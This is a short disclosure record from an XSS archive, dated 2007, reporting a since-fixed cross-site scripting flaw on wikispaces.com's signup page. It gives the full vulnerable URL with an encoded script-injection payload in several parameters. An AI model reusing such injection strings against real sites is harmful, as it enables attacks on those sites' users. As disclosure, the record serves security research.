Fixed XSS vulnerability at www.wikispaces.com

2007-12-06T00:00:00
ID XSSED:9861
Type xssed
Reporter pH4nToM
Modified 2007-12-06T00:00:00

Description

Security researcher pH4nToM, has submitted on 12/06/2007 a cross-site-scripting (XSS) vulnerability affecting www.wikispaces.com, which at the time of submission ranked 10696 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 12/06/2007. It is currently fixed.

Vulnerable URL: https://www.wikispaces.com/user/join?email=%22%3E%3Cscript%3Ealert%28%22pH4nToM+pwnt+u%22%29%3C%2Fscript%3E&username=%22%3E%3Cscript%3Ealert%28%22pH4nToM+pwnt+u%22%29%3C%2Fscript%3E&space=%22%3E%3Cscript%3Ealert%28%22pH4nToM+pwnt+u%22&permissions=&promotion_code=&join_mode=&edu=&token=f805c25f5641913768faf1983725058a